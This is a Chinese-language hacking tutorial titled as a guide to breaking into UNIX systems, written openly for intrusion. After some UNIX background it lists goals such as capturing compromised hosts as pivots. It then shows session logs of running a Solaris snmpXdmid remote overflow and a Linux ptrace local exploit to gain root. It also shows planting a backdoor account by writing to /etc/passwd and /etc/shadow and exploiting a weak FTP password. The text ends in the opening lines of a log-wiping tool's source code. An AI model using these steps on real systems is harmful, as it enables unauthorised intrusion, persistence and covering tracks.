2021年如何入侵UNIX.docx

资料来源：来自本人网络整理！祝您工作顺利！2021年如何入侵UNIX 　　Unix的架构很严密，权限管理很严，要想入侵Unix，必需要打破权限关，下面是我整理的一些关于UNIX入侵的相关资料，供你参考 　　什么是UNIX? 　　NIX操作系统(尤尼斯)，是一个强大的多用户、多任务操作系统，支持多种处理器架构，根据操作系统的分类，属于分时操作系统，最早由KenThompson、Dennis Ritchie和Douglas McIlroy于1969年在ATT的贝尔试验室开发目前它的商标权由国际开放标准组织所拥有，只有符合单一UNIX标准的UNIX系统才能用法UNIX这个名称，否那么只能称为类UNIX(UNIX-like) 　　一：根本学问 　　1：常见UNIX版本： 　　SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Unix,Unicos,Unix ware... 　　2:简洁介绍几个 　　sunossolaris SUN原来想用solaris取代sunos，不过在用户的要求下，到目前为止，还是维持两者并存的政策; 　　Freebsd是有名的BSD-UNIX的一的继承者，是UNIX众多分支中相当稳定的一个，许多ISP均用法运行Freebsd; 　　Linux是一个面对PC机个人用户的自由廉价的UNIX产品(其硬件平台是Intel系列的CPU)，事实上众多的网络管理员真正用法的是Linux。

　　3：UNIX操作系统的特点 　　(1)多用户和多任务;(2)可移植性;(3)树行构造的文件系统;(4)I/O重定向技术和管道技术;(5)丰富的有用程序;(6)每个用户都有电子邮件 　　4：尤为突出的优点 　　(1)稳定牢靠性高;(2)网络功能强;(3)开发性好;(4)强大的数据库支持功能;(5)伸缩性强 　　二：入侵目的 　　1：学习UNIX，熟识内部操作，整体配置... 　　2：做跳板或以此捕捉更多UNIX肉鸡; 　　3：越权得到某些正常恳求下得不到的东西; 　　4：攻击破坏或以此作为利器来破坏其他系统; 　　5：更多...... 　　三：入侵方法 　　1：查找目的 工具：supperscan，流光，LANguard Network Scanner 2.0或者其他，凭个人爱好选用 　　supperscan：扫描23，79端口，留意含%，#，...主机，这些就是UNIX; 　　LANguard..作简洁设置，即可开头，推断对方操作系统功能乃同类软件中的精品，直观精确; 　　流光：利用高级扫描，选telnet，PRC，POP3，FTP，Finger即可。

　　其他方法一样... 　　(说明：许多管理员为了迷惑入侵者往往有意更改telnet登陆时出现的信息，请留意识别) 2：开头入侵 (1)溢出(全部关于UNIX的溢出，都需要在一个UNIX/Linux的环境下进展编译) 　　A：远程溢出 　　溢出?呵呵，太多了!任凭说几个：freebsd远程溢出，bind 远程溢出，Sun Solaris 5.7/5.8 Sparc远程溢出，redhat6.xrpc status远程溢出...自己去一一理解吧，在这里我简洁说两个例子： 　　a1：考虑到许多伴侣用法windows，所以大家可以参看我的兄弟---蓝骑士的大作《freebsd溢出完全图文版》(地址： ://.itser /ez/.bbs/topic.cgi?forum=7topic=25show=)，因为这个溢出程序有已经编译好了可以挺直在windows下用法; 　　a2:Sun Solaris 5.7 Sparc远程溢出 　　搜寻...最终让我找到了一台sunos 5.7，上我一台sunos 5.8 　　telnet 66.*.146.48 -----这是我的! 　　SunOS 5.8 login: ply 　　Password: 　　Last login: Tue Apr 23 03:55:09 from 39448.ddn.xaonli 　　Sun Microsystems Inc. SunOS 5.8 Generic February 2000 　　$ tmp/.sh -----当时溢出时做的处理! 　　# ls 　　bin data etc initrd mnt proc sbin usr 　　boot dev home lib misc opt root tmp var 　　xfn skip 　　# cat snmp.c ....... -----太长了，省略...自己去找! # gcc -o snmp snmp.c -----用gcc编译 　　snmp.c: In function `main: 　　snmp.c:181: warning: passing arg 3 of pointer to function from incompatible pointer type 　　snmp.c:181: warning: passing arg 4 of pointer to function from incompatible pointer type 　　snmp.c:181: warning: passing arg 5 of pointer to function from incompatible pointer type 　　# ls 　　bin data etc initrd mnt proc sbin snmp usr 　　boot dev home lib misc opt root snmp.c tmp var 　　# ./snmp 　　copyright LAST STAGE OF DELIRIUM mar 2021 poland //lsd- 　　snmpXdmid for solaris 2.7 2.8 sparc usage: ./s address [-p port] -v 7|8 　　#./snmp 216.*.45.63 -v 7 ----开头溢出!! 　　DELIRIUM mar 2021 poland //lsd- 　　snmpXdmid for solaris 2.7 2.8 sparc adr=0x000c8f68 timeout=30 port=928 connected! 　　sent! 　　SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u sparc SUNW,Ultra-80 　　id 　　uid=0(root) gid=0(root) -----是root哦! 　　echo ply::0:0::/:/bin/bash /etc/passwd -----加个用户先! 　　echo ply:::::::: /etc/shadow 　　... -----还想干什么就连续吧! B：本地溢出 　　本地溢出需要一个具有Shell权限的帐号，这个帐号可以通过pop3或ftp弱密码得到，照样举个例子： 　　流光扫描...一会儿得到了一个ftp帐号(webmaster，webmaster)，先telnet上去! 　　telnet *.174.62.135 Red Hat Linux release 6.2 (Cartman) -----linux 6.2,简单搞定! 　　Kernel 2.2.12-20kr2smp on an i686 　　login: webmaster 　　Password: 　　Last login: Wed Apr 24 02:21:58 from *.*.*.* 　　You have mail. -----这家伙有新邮件，不过我没爱好! 　　[webmaster@ns webmaster]$ -----气人的一般用户$ 　　[webmaster@ns webmaster]$cat ts.c 　　... -----要学会利用网络资源，自己找，当是练习! 　　[webmaster@ns webmaster]$gcc -o ts ts.c -----还是用gcc编译。

　　In file included from /usr/include/asm/user.h:5, 　　from /usr/include/linux/user.h:1, 　　from ts.c:30: 　　/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL redefined 　　/usr/include/sys/ptrace.h:103: warning: this is the location of the previous def 　　inition 　　[webmaster@ns webmaster]$ ls 　　Desktop/ Mail/ ts* ts.c 　　[webmaster@ns webmaster]$ ./ts 　　attached 　　bash# su root 　　[root@ns webmaster]# -----搞定，观察#我就兴奋! 　　[root@ns webmaster]# cat wipe.c -----扫脚印的，这个还是给大家吧，否那么有人要扁我了! 　　/*============================================================================= 　　UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD 　　The Shadow Penguin Security ( :// ) 　　Written by UNYUN ( unewn4th@ ) 　　============================================================================= 　　*/ #include 　　#include 　　#include 　　#include #ifde。